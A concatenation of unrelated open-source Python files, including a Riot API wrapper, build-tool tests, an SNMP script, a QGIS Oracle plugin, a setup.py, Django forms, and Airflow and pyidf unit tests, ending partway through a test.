endIndex=end_index
)
# match list-v2.2
def _match_list_request(self, end_url, region, **kwargs):
return self.base_request(
'v{version}/matchlist/by-summoner/{end_url}'.format(
version=api_versions['matchlist'],
end_url=end_url,
),
region,
**kwargs
)
def get_match_list(self, summoner_id, region=None, champion_ids=None, ranked_queues=None, seasons=None,
begin_time=None, end_time=None, begin_index=None, end_index=None):
return self._match_list_request(
'{summoner_id}'.format(summoner_id=summoner_id),
region,
            championIds=champion_ids,
rankedQueues=ranked_queues,
seasons=seasons,
beginTime=begin_time,
endTime=end_time,
beginIndex=begin_index,
endIndex=end_index
)
# stats-v1.3
def _stats_request(self, end_url, region, **kwargs):
return self.base_request(
'v{version}/stats/{end_url}'.format(
version=api_versions['stats'],
end_url=end_url
),
region,
**kwargs
)
def get_stat_summary(self, summoner_id, region=None, season=None):
return self._stats_request(
'by-summoner/{summoner_id}/summary'.format(summoner_id=summoner_id),
region,
season='SEASON{}'.format(season) if season is not None else None)
def get_ranked_stats(self, summoner_id, region=None, season=None):
return self._stats_request(
'by-summoner/{summoner_id}/ranked'.format(summoner_id=summoner_id),
region,
season='SEASON{}'.format(season) if season is not None else None
)
# summoner-v1.4
def _summoner_request(self, end_url, region, **kwargs):
return self.base_request(
'v{version}/summoner/{end_url}'.format(
version=api_versions['summoner'],
end_url=end_url
),
region,
**kwargs
)
def get_mastery_pages(self, summoner_ids, region=None):
return self._summoner_request(
'{summoner_ids}/masteries'.format(summoner_ids=','.join([str(s) for s in summoner_ids])),
region
)
def get_rune_pages(self, summoner_ids, region=None):
return self._summoner_request(
'{summoner_ids}/runes'.format(summoner_ids=','.join([str(s) for s in summoner_ids])),
region
)
def get_summoners(self, names=None, ids=None, region=None):
if (names is None) != (ids is None):
return self._summoner_request(
'by-name/{summoner_names}'.format(
summoner_names=','.join([self.sanitized_name(n) for n in names])) if names is not None
else '{summoner_ids}'.format(summoner_ids=','.join([str(i) for i in ids])),
region
)
else:
return None
def get_summoner(self, name=None, _id=None, region=None):
if (name is None) != (_id is None):
if name is not None:
name = self.sanitized_name(name)
return self.get_summoners(names=[name, ], region=region)[name]
else:
return self.get_summoners(ids=[_id, ], region=region)[str(_id)]
return None
def get_summoner_name(self, summoner_ids, region=None):
return self._summoner_request(
'{summoner_ids}/name'.format(summoner_ids=','.join([str(s) for s in summoner_ids])),
region
)
# team-v2.4
def _team_request(self, end_url, region, **kwargs):
return self.base_request(
'v{version}/team/{end_url}'.format(
version=api_versions['team'],
end_url=end_url
),
region,
**kwargs
)
def get_teams_for_summoner(self, summoner_id, region=None):
return self.get_teams_for_summoners([summoner_id, ], region=region)[str(summoner_id)]
def get_teams_for_summoners(self, summoner_ids, region=None):
return self._team_request(
'by-summoner/{summoner_id}'.format(summoner_id=','.join([str(s) for s in summoner_ids])),
region
)
def get_team(self, team_id, region=None):
return self.get_teams([team_id, ], region=region)[str(team_id)]
def get_teams(self, team_ids, region=None):
return self._team_request('{team_ids}'.format(team_ids=','.join(str(t) for t in team_ids)), region)
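# --- Hedged usage sketch (illustration only): the API key and summoner name are
# placeholders, and the dict keys follow the summoner-v1.4 response format. ---
if __name__ == '__main__':
    watcher = RiotWatcher('my-riot-api-key', default_region=NORTH_AMERICA)
    # Wait for a free slot in the default rate limits before calling the API.
    while not watcher.can_make_request():
        time.sleep(1)
    summoner = watcher.get_summoner(name='Example Name')
    print(summoner)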
|
gnozell/Yar-Ha-Har
|
lib/riotwatcher/riotwatcher.py
|
Python
|
mit
| 22,700 | 0.00163 |
#!/usr/bin/env python
# -*- coding: utf-8 -*-
# Copyright (c) 2012-2021 SoftBank Robotics. All rights reserved.
# Use of this source code is governed by a BSD-style license (see the COPYING file).
""" Test QiBuild Find """
from __future__ import absolute_import
from __future__ import unicode_literals
from __future__ import print_function
import qibuild.config
from qibuild import find
from qibuild.test.conftest import QiBuildAction
from qitoolchain.test.conftest import QiToolchainAction
def test_find_target_in_project_cmake(qibuild_action, record_messages):
""" Test Find Target In Project CMake """
qibuild_action.add_test_project("world")
qibuild_action.add_test_project("hello")
qibuild_action("configure", "hello")
record_messages.reset()
qibuild_action("find", "--cmake", "hello", "world")
assert record_messages.find("WORLD_LIBRARIES")
def test_find_target_in_toolchain_package_cmake(cd_to_tmpdir, record_messages):
""" Test Find Target In Toolchain Package CMake """
qibuild_action = QiBuildAction()
qitoolchain_action = QiToolchainAction()
build_worktree = qibuild_action.build_worktree
qibuild_action.add_test_project("world")
qibuild_action.add_test_project("hello")
world_package = qibuild_action("package", "world")
qitoolchain_action("create", "foo")
qibuild.config.add_build_config("foo", toolchain="foo")
qitoolchain_action("add-package", "-c", "foo", world_package)
build_worktree.worktree.remove_project("world", from_disk=True)
record_messages.reset()
qibuild_action.chdir("hello")
qibuild_action("configure", "-c", "foo")
qibuild_action("find", "--cmake", "world", "-c", "foo")
assert record_messages.find("WORLD_LIBRARIES")
def test_find_target_in_build_dir(qibuild_action, record_messages):
""" Test Find Target In Build Dir """
qibuild_action.add_test_project("world")
qibuild_action.add_test_project("hello")
qibuild_action("configure", "hello")
qibuild_action("make", "hello")
record_messages.reset()
qibuild_action("find", "hello", "world")
assert record_messages.find(find.library_name("world"))
rc = qibuild_action("find", "hello", "libworld", retcode=True)
assert rc == 1
def test_find_target_in_toolchain_package(cd_to_tmpdir, record_messages):
""" Test Find Target In Toolchain Package """
qibuild_action = QiBuildAction()
qitoolchain_action = QiToolchainAction()
qibuild_action.add_test_project("world")
qibuild_action.add_test_project("hello")
world_package = qibuild_action("package", "world")
qitoolchain_action("create", "foo")
qibuild.config.add_build_config("foo", toolchain="foo")
qitoolchain_action("add-package", "-c", "foo", world_package)
qibuild_action.chdir("hello")
qibuild_action("configure", "-c", "foo")
qibuild_action("make", "-c", "foo")
record_messages.reset()
qibuild_action("find", "world", "-c", "foo")
assert record_messages.find(find.library_name("world"))
record_messages.reset()
qibuild_action("find", "hello", "-c", "foo")
assert record_messages.find(find.binary_name("hello"))
rc = qibuild_action("find", "libeggs", "-c", "foo", retcode=True)
assert rc == 1
|
aldebaran/qibuild
|
python/qibuild/test/test_qibuild_find.py
|
Python
|
bsd-3-clause
| 3,244 | 0.000308 |
#!/usr/bin/python
import getpass
import snmp_helper
from snmp_helper import snmp_get_oid,snmp_extract
import yaml
DeviceIp1 = '184.105.247.70'
DeviceIp2 = '184.105.247.71'
SnmpPort = 161
sysNameOID = '.1.3.6.1.2.1.1.5.0'
sysDescOID = '.1.3.6.1.2.1.1.1.0'
#Prompting for the device IPs with raw_input and for the SNMP community string with getpass
DeviceIp1 = raw_input("pynet-rtr1 IP address: ")
DeviceIp2 = raw_input("pynet-rtr2 IP address: ")
SnmpString = getpass.getpass(prompt="Community string: ")
#Creating a tuple for each device, consisting of the IP, SNMP string and SNMP port
SnmpDevice1 = (DeviceIp1, SnmpString, SnmpPort)
SnmpDevice2 = (DeviceIp2, SnmpString, SnmpPort)
#Looping over each device and each OID, using the snmp_helper library methods
SnmpFileOutput = 'SnmpInformation.txt'
for SnmpDevices in (SnmpDevice1, SnmpDevice2):
    for OIDs in (sysNameOID, sysDescOID):
        SnmpInformation = snmp_get_oid(SnmpDevices, oid=OIDs)
        SnmpDescOutput = snmp_extract(SnmpInformation)
        #Appending each result to the yaml file so both devices and both OIDs are kept
        with open(SnmpFileOutput, "a") as f:
            f.write(yaml.safe_dump(SnmpDescOutput, default_flow_style=False))
print "\nResults printed to a yaml file.\n"
|
brutalic/pynet_brutal
|
class2/GetSysNameDesc.py
|
Python
|
apache-2.0
| 1,227 | 0.007335 |
# -*- coding: utf-8 -*-
"""
/***************************************************************************
Name : DB Manager
Description : Database manager plugin for QGIS (Oracle)
Date : Aug 27, 2014
copyright : (C) 2014 by Médéric RIBREUX
email : mederic.ribreux@gmail.com
The content of this file is based on
- PG_Manager by Martin Dobias <wonder.sk@gmail.com> (GPLv2 license)
- DB Manager by Giuseppe Sucameli <brush.tyler@gmail.com> (GPLv2 license)
***************************************************************************/
/***************************************************************************
* *
* This program is free software; you can redistribute it and/or modify *
* it under the terms of the GNU General Public License as published by *
* the Free Software Foundation; either version 2 of the License, or *
* (at your option) any later version. *
* *
***************************************************************************/
"""
# this will disable the dbplugin if the connector raise an ImportError
from .connector import OracleDBConnector
from PyQt4.QtCore import *
from PyQt4.QtGui import *
from ..plugin import ConnectionError, InvalidDataException, DBPlugin, \
Database, Schema, Table, VectorTable, TableField, TableConstraint, \
TableIndex, TableTrigger, TableRule
try:
from . import resources_rc
except ImportError:
pass
from ..html_elems import HtmlParagraph, HtmlList, HtmlTable
from qgis.core import QgsCredentials
def classFactory():
return OracleDBPlugin
class OracleDBPlugin(DBPlugin):
@classmethod
def icon(self):
return QIcon(":/db_manager/oracle/icon")
@classmethod
def typeName(self):
return 'oracle'
@classmethod
def typeNameString(self):
return 'Oracle Spatial'
@classmethod
def providerName(self):
return 'oracle'
@classmethod
def connectionSettingsKey(self):
return '/Oracle/connections'
def connectToUri(self, uri):
self.db = self.databasesFactory(self, uri)
if self.db:
return True
return False
def databasesFactory(self, connection, uri):
return ORDatabase(connection, uri)
def connect(self, parent=None):
conn_name = self.connectionName()
settings = QSettings()
settings.beginGroup(u"/{0}/{1}".format(
self.connectionSettingsKey(), conn_name))
if not settings.contains("database"): # non-existent entry?
raise InvalidDataException(
self.tr('There is no defined database connection "{}".'.format(
conn_name)))
from qgis.core import QgsDataSourceURI
uri = QgsDataSourceURI()
settingsList = ["host", "port", "database", "username", "password"]
host, port, database, username, password = map(
lambda x: settings.value(x, "", type=str), settingsList)
        # qgis 1.5 used 'savePassword' instead of the 'save' setting
savedPassword = settings.value("save", False, type=bool) or \
settings.value("savePassword", False, type=bool)
        # get all of the connection options
useEstimatedMetadata = settings.value(
"estimatedMetadata", False, type=bool)
uri.setParam('userTablesOnly', unicode(
settings.value("userTablesOnly", False, type=bool)))
uri.setParam('geometryColumnsOnly', unicode(
settings.value("geometryColumnsOnly", False, type=bool)))
uri.setParam('allowGeometrylessTables', unicode(
settings.value("allowGeometrylessTables", False, type=bool)))
uri.setParam('onlyExistingTypes', unicode(
settings.value("onlyExistingTypes", False, type=bool)))
settings.endGroup()
uri.setConnection(host, port, database, username, password)
uri.setUseEstimatedMetadata(useEstimatedMetadata)
err = u""
try:
return self.connectToUri(uri)
except ConnectionError as e:
err = unicode(e)
# ask for valid credentials
max_attempts = 3
for i in range(max_attempts):
(ok, username, password) = QgsCredentials.instance().get(
uri.connectionInfo(False), username, password, err)
if not ok:
return False
uri.setConnection(host, port, database, username, password)
try:
self.connectToUri(uri)
except ConnectionError as e:
if i == max_attempts - 1: # failed the last attempt
raise e
err = unicode(e)
continue
QgsCredentials.instance().put(
uri.connectionInfo(False), username, password)
return True
return False
class ORDatabase(Database):
def __init__(self, connection, uri):
self.connName = connection.connectionName()
Database.__init__(self, connection, uri)
def connectorsFactory(self, uri):
return OracleDBConnector(uri, self.connName)
def dataTablesFactory(self, row, db, schema=None):
return ORTable(row, db, schema)
def vectorTablesFactory(self, row, db, schema=None):
return ORVectorTable(row, db, schema)
def info(self):
from .info_model import ORDatabaseInfo
return ORDatabaseInfo(self)
def schemasFactory(self, row, db):
return ORSchema(row, db)
def columnUniqueValuesModel(self, col, table, limit=10):
l = u""
if limit:
l = u"WHERE ROWNUM < {:d}".format(limit)
con = self.database().connector
        # Do not list distinct values for geometry columns
tableName = table.replace(u'"', u"").split(u".")
if len(tableName) == 0:
tableName = [None, tableName[0]]
colName = col.replace(u'"', u"").split(u".")[-1]
if con.isGeometryColumn(tableName, colName):
return None
query = u"SELECT DISTINCT {} FROM {} {}".format(col, table, l)
return self.sqlResultModel(query, self)
def sqlResultModel(self, sql, parent):
from .data_model import ORSqlResultModel
return ORSqlResultModel(self, sql, parent)
def toSqlLayer(self, sql, geomCol, uniqueCol,
layerName=u"QueryLayer", layerType=None,
avoidSelectById=False, filter=""):
from qgis.core import QgsMapLayer, QgsVectorLayer
uri = self.uri()
con = self.database().connector
uri.setDataSource(u"", u"({})".format(sql), geomCol, filter, uniqueCol.strip(u'"'))
if avoidSelectById:
uri.disableSelectAtId(True)
provider = self.dbplugin().providerName()
vlayer = QgsVectorLayer(uri.uri(False), layerName, provider)
# handling undetermined geometry type
if not vlayer.isValid():
wkbType, srid = con.getTableMainGeomType(
u"({})".format(sql), geomCol)
uri.setWkbType(wkbType)
if srid:
uri.setSrid(unicode(srid))
vlayer = QgsVectorLayer(uri.uri(False), layerName, provider)
return vlayer
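    # Hedged usage sketch (schema, column and layer names are placeholders;
    # QgsMapLayerRegistry is the QGIS 2.x API matching the PyQt4 imports above):
    #
    #   layer = db.toSqlLayer('SELECT ID, GEOM FROM MY_SCHEMA.ROADS',
    #                         'GEOM', '"ID"', layerName='roads_query')
    #   if layer.isValid():
    #       QgsMapLayerRegistry.instance().addMapLayer(layer)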
def registerDatabaseActions(self, mainWindow):
action = QAction(QApplication.translate(
"DBManagerPlugin", "&Re-connect"), self)
mainWindow.registerAction(action, QApplication.translate(
"DBManagerPlugin", "&Database"), self.reconnectActionSlot)
if self.schemas():
action = QAction(QApplication.translate(
"DBManagerPlugin", "&Create schema"), self)
mainWindow.registerAction(action, QApplication.translate(
"DBManagerPlugin", "&Schema"), self.createSchemaActionSlot)
action = QAction(QApplication.translate(
"DBManagerPlugin", "&Delete (empty) schema"), self)
mainWindow.registerAction(action, QApplication.translate(
"DBManagerPlugin", "&Schema"), self.deleteSchemaActionSlot)
action = QAction(QApplication.translate(
"DBManagerPlugin", "Delete selected item"), self)
mainWindow.registerAction(action, None, self.deleteActionSlot)
action.setShortcuts(QKeySequence.Delete)
action = QAction(QIcon(":/db_manager/actions/create_table"),
QApplication.translate(
"DBManagerPlugin", "&Create table"), self)
mainWindow.registerAction(action, QApplication.translate(
"DBManagerPlugin", "&Table"), self.createTableActionSlot)
action = QAction(QIcon(":/db_manager/actions/edit_table"),
QApplication.translate(
"DBManagerPlugin", "&Edit table"), self)
mainWindow.registerAction(action, QApplication.translate(
"DBManagerPlugin", "&Table"), self.editTableActionSlot)
action = QAction(QIcon(":/db_manager/actions/del_table"),
QApplication.translate(
"DBManagerPlugin", "&Delete table/view"), self)
mainWindow.registerAction(action, QApplication.translate(
"DBManagerPlugin", "&Table"), self.deleteTableActionSlot)
action = QAction(QApplication.translate(
"DBManagerPlugin", "&Empty table"), self)
mainWindow.registerAction(action, QApplication.translate(
"DBManagerPlugin", "&Table"), self.emptyTableActionSlot)
class ORSchema(Schema):
def __init__(self, row, db):
Schema.__init__(self, db)
# self.oid, self.name, self.owner, self.perms, self.comment = row
self.name = row[0]
class ORTable(Table):
def __init__(self, row, db, schema=None):
Table.__init__(self, db, schema)
self.name, self.owner, isView = row
self.estimatedRowCount = None
self.objectType = None
self.isView = False
self.isMaterializedView = False
if isView == 1:
self.isView = True
self.creationDate = None
self.modificationDate = None
def getDates(self):
"""Grab the creation/modification dates of the table"""
self.creationDate, self.modificationDate = (
self.database().connector.getTableDates((self.schemaName(),
self.name)))
def refreshRowEstimation(self):
"""Use ALL_ALL_TABLE to get an estimation of rows"""
if self.isView:
self.estimatedRowCount = 0
self.estimatedRowCount = (
self.database().connector.getTableRowEstimation(
(self.schemaName(), self.name)))
def getType(self):
"""Grab the type of object for the table"""
self.objectType = self.database().connector.getTableType(
(self.schemaName(), self.name))
def getComment(self):
"""Grab the general comment of the table/view"""
self.comment = self.database().connector.getTableComment(
(self.schemaName(), self.name), self.objectType)
def getDefinition(self):
return self.database().connector.getDefinition(
(self.schemaName(), self.name), self.objectType)
def getMViewInfo(self):
if self.objectType == u"MATERIALIZED VIEW":
return self.database().connector.getMViewInfo(
(self.schemaName(), self.name))
else:
return None
def runAction(self, action):
action = unicode(action)
if action.startswith("rows/"):
if action == "rows/recount":
self.refreshRowCount()
return True
elif action.startswith("index/"):
parts = action.split('/')
index_name = parts[1]
index_action = parts[2]
msg = QApplication.translate(
"DBManagerPlugin",
"Do you want to {} index {}?".format(
index_action, index_name))
QApplication.restoreOverrideCursor()
try:
if QMessageBox.question(
None,
QApplication.translate(
"DBManagerPlugin", "Table Index"),
msg,
QMessageBox.Yes | QMessageBox.No) == QMessageBox.No:
return False
finally:
QApplication.setOverrideCursor(Qt.WaitCursor)
if index_action == "rebuild":
self.aboutToChange()
self.database().connector.rebuildTableIndex(
(self.schemaName(), self.name), index_name)
self.refreshIndexes()
return True
elif action.startswith(u"mview/"):
if action == "mview/refresh":
self.aboutToChange()
self.database().connector.refreshMView(
(self.schemaName(), self.name))
return True
return Table.runAction(self, action)
def tableFieldsFactory(self, row, table):
return ORTableField(row, table)
def tableConstraintsFactory(self, row, table):
return ORTableConstraint(row, table)
def tableIndexesFactory(self, row, table):
return ORTableIndex(row, table)
def tableTriggersFactory(self, row, table):
return ORTableTrigger(row, table)
def info(self):
from .info_model import ORTableInfo
return ORTableInfo(self)
def tableDataModel(self, parent):
from .data_model import ORTableDataModel
return ORTableDataModel(self, parent)
def getValidQGisUniqueFields(self, onlyOne=False):
""" list of fields valid to load the table as layer in QGis canvas.
QGis automatically search for a valid unique field, so it's
needed only for queries and views.
"""
ret = []
# add the pk
pkcols = filter(lambda x: x.primaryKey, self.fields())
if len(pkcols) == 1:
ret.append(pkcols[0])
# then add integer fields with an unique index
indexes = self.indexes()
if indexes is not None:
for idx in indexes:
if idx.isUnique and len(idx.columns) == 1:
fld = idx.fields()[idx.columns[0]]
if (fld.dataType == u"NUMBER"
and not fld.modifier
and fld.notNull
and fld not in ret):
ret.append(fld)
# and finally append the other suitable fields
for fld in self.fields():
if (fld.dataType == u"NUMBER"
and not fld.modifier
and fld.notNull
and fld not in ret):
ret.append(fld)
if onlyOne:
return ret[0] if len(ret) > 0 else None
return ret
def uri(self):
uri = self.database().uri()
schema = self.schemaName() if self.schemaName() else ''
geomCol = self.geomColumn if self.type in [
Table.VectorType, Table.RasterType] else ""
uniqueCol = self.getValidQGisUniqueFields(
True) if self.isView else None
uri.setDataSource(schema, self.name, geomCol if geomCol else None,
None, uniqueCol.name if uniqueCol else "")
# Handle geographic table
if geomCol:
uri.setWkbType(self.wkbType)
uri.setSrid(unicode(self.srid))
return uri
class ORVectorTable(ORTable, VectorTable):
def __init__(self, row, db, schema=None):
ORTable.__init__(self, row[0:3], db, schema)
VectorTable.__init__(self, db, schema)
self.geomColumn, self.geomType, self.wkbType, self.geomDim, \
self.srid = row[-7:-2]
def info(self):
from .info_model import ORVectorTableInfo
return ORVectorTableInfo(self)
def runAction(self, action):
if action.startswith("extent/"):
if action == "extent/update":
self.aboutToChange()
self.updateExtent()
return True
if ORTable.runAction(self, action):
return True
return VectorTable.runAction(self, action)
def canUpdateMetadata(self):
return self.database().connector.canUpdateMetadata((self.schemaName(),
self.name))
def updateExtent(self):
self.database().connector.updateMetadata(
(self.schemaName(), self.name),
self.geomColumn, extent=self.extent)
self.refreshTableEstimatedExtent()
self.refresh()
def hasSpatialIndex(self, geom_column=None):
geom_column = geom_column if geom_column else self.geomColumn
for idx in self.indexes():
if geom_column == idx.column:
return True
return False
class ORTableField(TableField):
def __init__(self, row, table):
""" build fields information from query and find primary key """
TableField.__init__(self, table)
self.num, self.name, self.dataType, self.charMaxLen, \
self.modifier, self.notNull, self.hasDefault, \
self.default, typeStr, self.comment = row
self.primaryKey = False
self.num = int(self.num)
if isinstance(self.charMaxLen, QPyNullVariant):
self.charMaxLen = None
else:
self.charMaxLen = int(self.charMaxLen)
if isinstance(self.modifier, QPyNullVariant):
self.modifier = None
else:
self.modifier = int(self.modifier)
if self.notNull.upper() == u"Y":
self.notNull = False
else:
self.notNull = True
if isinstance(self.comment, QPyNullVariant):
self.comment = u""
# find out whether fields are part of primary key
for con in self.table().constraints():
if (con.type == ORTableConstraint.TypePrimaryKey
and self.name == con.column):
self.primaryKey = True
break
def type2String(self):
if (u"TIMESTAMP" in self.dataType
or self.dataType in [u"DATE", u"SDO_GEOMETRY",
u"BINARY_FLOAT", u"BINARY_DOUBLE"]):
return u"{}".format(self.dataType)
if self.charMaxLen in [None, -1]:
return u"{}".format(self.dataType)
elif self.modifier in [None, -1, 0]:
return u"{}({})".format(self.dataType, self.charMaxLen)
return u"{}({},{})".format(self.dataType, self.charMaxLen,
self.modifier)
def update(self, new_name, new_type_str=None, new_not_null=None,
new_default_str=None):
self.table().aboutToChange()
if self.name == new_name:
new_name = None
if self.type2String() == new_type_str:
new_type_str = None
if self.notNull == new_not_null:
new_not_null = None
if self.default2String() == new_default_str:
new_default_str = None
ret = self.table().database().connector.updateTableColumn(
(self.table().schemaName(), self.table().name),
self.name, new_name, new_type_str,
new_not_null, new_default_str)
# When changing a field, refresh also constraints and
# indexes.
if ret is not False:
self.table().refreshFields()
self.table().refreshConstraints()
self.table().refreshIndexes()
return ret
class ORTableConstraint(TableConstraint):
TypeCheck, TypeForeignKey, TypePrimaryKey, \
TypeUnique, TypeUnknown = range(5)
types = {"c": TypeCheck, "r": TypeForeignKey,
"p": TypePrimaryKey, "u": TypeUnique}
def __init__(self, row, table):
""" build constraints info from query """
TableConstraint.__init__(self, table)
self.name, constr_type_str, self.column, self.validated, \
self.generated, self.status = row[0:6]
constr_type_str = constr_type_str.lower()
if constr_type_str in ORTableConstraint.types:
self.type = ORTableConstraint.types[constr_type_str]
else:
self.type = ORTableConstraint.TypeUnknown
if isinstance(row[6], QPyNullVariant):
self.checkSource = u""
else:
self.checkSource = row[6]
if isinstance(row[8], QPyNullVariant):
self.foreignTable = u""
else:
self.foreignTable = row[8]
if isinstance(row[7], QPyNullVariant):
self.foreignOnDelete = u""
else:
self.foreignOnDelete = row[7]
if isinstance(row[9], QPyNullVariant):
self.foreignKey = u""
else:
self.foreignKey = row[9]
def type2String(self):
if self.type == ORTableConstraint.TypeCheck:
return QApplication.translate("DBManagerPlugin", "Check")
if self.type == ORTableConstraint.TypePrimaryKey:
return QApplication.translate("DBManagerPlugin", "Primary key")
if self.type == ORTableConstraint.TypeForeignKey:
return QApplication.translate("DBManagerPlugin", "Foreign key")
if self.type == ORTableConstraint.TypeUnique:
return QApplication.translate("DBManagerPlugin", "Unique")
return QApplication.translate("DBManagerPlugin", 'Unknown')
def fields(self):
""" Hack to make edit dialog box work """
fields = self.table().fields()
field = None
for fld in fields:
if fld.name == self.column:
field = fld
cols = {}
cols[0] = field
return cols
class ORTableIndex(TableIndex):
def __init__(self, row, table):
TableIndex.__init__(self, table)
self.name, self.column, self.indexType, self.status, \
self.analyzed, self.compression, self.isUnique = row
def fields(self):
""" Hack to make edit dialog box work """
self.table().refreshFields()
fields = self.table().fields()
field = None
for fld in fields:
if fld.name == self.column:
field = fld
cols = {}
cols[0] = field
return cols
class ORTableTrigger(TableTrigger):
def __init__(self, row, table):
TableTrigger.__init__(self, table)
self.name, self.event, self.type, self.enabled = row
|
SebDieBln/QGIS
|
python/plugins/db_manager/db_plugins/oracle/plugin.py
|
Python
|
gpl-2.0
| 22,853 | 0.000131 |
import glob
import os
import shutil
from distutils import sysconfig
from setuptools import setup, Command
from setuptools.command.install import install
here=os.path.dirname(os.path.abspath(__file__))
site_packages_path = sysconfig.get_python_lib()
class CleanCommand(Command):
"""Custom clean command to tidy up the project root."""
CLEAN_FILES = './build ./dist ./*.pyc ./*.tgz ./*.egg-info'.split(' ')
user_options = []
def initialize_options(self):
pass
def finalize_options(self):
pass
def run(self):
global here
for path_spec in self.CLEAN_FILES:
# Make paths absolute and relative to this path
abs_paths = glob.glob(os.path.normpath(os.path.join(here, path_spec)))
for path in [str(p) for p in abs_paths]:
if not path.startswith(here):
# Die if path in CLEAN_FILES is absolute + outside this directory
raise ValueError("%s is not a path inside %s" % (path, here))
print('removing %s' % os.path.relpath(path))
shutil.rmtree(path)
long_description="""
pyhotreload allows you to patch a system while it is running.
"""
setup(
name='pyhotreload',
version='0.0.1',
    description='patch a system while it is running',
long_description=long_description,
cmdclass={
'clean': CleanCommand,
},
url='https://github.com/mdsitton/pyHotReload/',
author='Matthew Sitton',
author_email='matthewsitton@gmail.com',
license='',
# See https://pypi.python.org/pypi?%3Aaction=list_classifiers
classifiers=[
# How mature is this project? Common values are
# 3 - Alpha
# 4 - Beta
# 5 - Production/Stable
'Development Status :: 4 - Beta',
# Indicate who your project is intended for
'Intended Audience :: Developers',
'Topic :: Software Development :: Build Tools',
# Pick your license as you wish (should match "license" above)
#'License :: OSI Approved :: MIT License',
'Programming Language :: Python :: 2.7',
'Programming Language :: Python :: 3.3',
],
# What does your project relate to?
keywords='hot reload',
install_requires=[],
packages=['hotreload'],
)
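# Usage sketch: the custom clean command registered in cmdclass above is run
# from the shell and removes the CLEAN_FILES paths relative to this file.
#   python setup.py clean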
|
stuaxo/pyHotReload
|
setup.py
|
Python
|
bsd-2-clause
| 2,321 | 0.004308 |
import os
import tempfile
import unittest
import logging
from pyidf import ValidationLevel
import pyidf
from pyidf.idf import IDF
from pyidf.compliance_objects import ComplianceBuilding
log = logging.getLogger(__name__)
class TestComplianceBuilding(unittest.TestCase):
def setUp(self):
self.fd, self.path = tempfile.mkstemp()
def tearDown(self):
os.remove(self.path)
def test_create_compliancebuilding(self):
pyidf.validation_level = ValidationLevel.error
obj = ComplianceBuilding()
# real
var_building_rotation_for_appendix_g = 1.1
obj.building_rotation_for_appendix_g = var_building_rotation_for_appendix_g
idf = IDF()
idf.add(obj)
idf.save(self.path, check=False)
with open(self.path, mode='r') as f:
for line in f:
log.debug(line.strip())
idf2 = IDF(self.path)
self.assertAlmostEqual(idf2.compliancebuildings[0].building_rotation_for_appendix_g, var_building_rotation_for_appendix_g)
|
rbuffat/pyidf
|
tests/test_compliancebuilding.py
|
Python
|
apache-2.0
| 1,041 | 0.003842 |
#!/usr/bin/env python3
"""
Open a csv file and read each row into a list; all the row-lists are contained
in a single list. In preparation for entry into the database the data is
cleaned. This includes validating the headers and stripping and lowering the
values.
"""
import csv
HEADERS = ['case number', 'case occurred from date', 'case occurred incident type', 'case ori',
'case subject age', 'case subject custody status', 'case subject global subject',
'case subject global subject address', 'case subject global subject address apartment',
'case subject global subject address city', 'case subject global subject address state',
'case subject global subject address zip',
'case subject global subject date of birth',
'case subject global subject primary phone number',
'case subject global subject race', 'case subject global subject sex',
'case subject type', 'reporting district']
def open_csv(path):
    # Open the csv file, lower-case and strip all the values. Make sure the csv
    # has the expected headers.
with open(path) as csvfile:
reader = list(csv.reader(csvfile, delimiter=','))
rows = [[val.strip().lower() for val in row] for row in reader]
if rows.pop(0) != HEADERS:
return False
return rows
def write_receipt(path, rows):
# Write the receipt to csv file.
with open(f'{path}/receipt.csv', 'w') as f:
writer = csv.writer(f)
writer.writerows(rows)
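# Illustrative usage of the two helpers above (the file names are hypothetical):
#   rows = open_csv('cases.csv')          # returns False if the headers differ from HEADERS
#   if rows:
#       write_receipt('/tmp/output', rows)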
def main():
pass
if __name__ == '__main__':
main()
|
scott48074/Restorative-Justice-App
|
app/csv_handler.py
|
Python
|
mit
| 1,556 | 0.003856 |
from django import forms
from registration.forms import RegistrationForm
from django.contrib.auth.models import User
from models import UserProfile
from models import *
class Registration(RegistrationForm):
picture = forms.ImageField(required=False)
bio = forms.CharField(widget=forms.Textarea(),required=False)
date_of_birth = forms.DateField(input_formats=['%d/%m/%Y'],required=False)
GENDER_CHOICES = (
("Male", "Male"),
("Female", "Female"),)
gender = forms.ChoiceField(widget=forms.RadioSelect,
choices=GENDER_CHOICES,required=False)
class UserForm(forms.ModelForm):
username = forms.CharField(required=False)
class Meta:
model = User
fields = ('username','email',)
class UserProfileForm(forms.ModelForm):
GENDER_CHOICES = (
("Male", "Male"),
("Female", "Female"),)
gender = forms.ChoiceField(widget=forms.RadioSelect,
choices=GENDER_CHOICES,required=False)
class Meta:
model = UserProfile
fields = ('picture','bio','gender')
class ParagraphForm(forms.ModelForm):
content = forms.CharField(max_length=200, help_text="Write your paragraph!")
choices = (
(True, 'yes'),
(False, 'no'))
end = forms.ChoiceField(choices=choices, widget=forms.RadioSelect)
class Meta:
model = Paragraph
exclude = ('story', 'parent', 'author','created_datetime')
class StoryForm(forms.ModelForm):
title = forms.CharField(max_length=100, help_text='Title', required = True)
#category = forms.ModelChoiceField(queryset=Category.objects.all().order_by('title'), help_text = "Category", required = True)
cat = forms.CharField(required = True)
text = forms.CharField(max_length=140, help_text="First Paragraph", required = True)
class Meta:
model = Story
exclude = ('created_datetime', 'author', 'slug', 'category')
|
RetroMelon/PatchWords
|
patchwords_project/patchwords/forms.py
|
Python
|
mit
| 1,944 | 0.013374 |
# -*- coding: utf-8 -*-
#
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
#
import json
import unittest
from airflow import configuration
from airflow import models
from airflow.utils import db
try:
from unittest import mock
except ImportError:
try:
import mock
except ImportError:
mock = None
class TestAzureDataLakeHook(unittest.TestCase):
def setUp(self):
configuration.load_test_config()
db.merge_conn(
models.Connection(
conn_id='adl_test_key',
conn_type='azure_data_lake',
login='client_id',
password='client secret',
extra=json.dumps({"tenant": "tenant",
"account_name": "accountname"})
)
)
@mock.patch('airflow.contrib.hooks.azure_data_lake_hook.lib', autospec=True)
def test_conn(self, mock_lib):
from airflow.contrib.hooks.azure_data_lake_hook import AzureDataLakeHook
from azure.datalake.store import core
hook = AzureDataLakeHook(azure_data_lake_conn_id='adl_test_key')
